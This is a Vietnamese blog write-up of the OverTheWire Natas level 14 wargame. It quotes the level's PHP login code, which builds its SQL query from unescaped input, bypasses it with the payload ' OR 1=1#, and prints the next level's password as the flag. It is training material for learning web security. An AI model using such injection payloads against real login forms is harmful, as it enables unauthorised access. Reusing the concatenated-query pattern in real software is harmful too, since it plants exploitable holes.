[OverTheWire] Natas – Level 14

http://natas14.natas.labs.overthewire.org/

Nhấn View sourcecode:

[php]‘);
mysql_select_db(‘natas14’, $link);

$query = “SELECT * from users where username=””.$_REQUEST[“username”].”” and password=””.$_REQUEST[“password”].”””;
if(array_key_exists(“debug”, $_GET)) {
echo “Executing query: $query
“;
}

if(mysql_num_rows(mysql_query($query, $link)) > 0) {
echo “Successful login! The password for natas15 is
“;
} else {
echo “Access denied!
“;
}
mysql_close($link);
} else {
?>[/php]

Ta thấy ngay được là username và password đều không bị escape. Inject với câu lệnh được dạy trong sách giáo khoa:

username = " OR 1=1#
password = <gì cũng được>

Kết quả:

Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

→ flag = AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J.

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *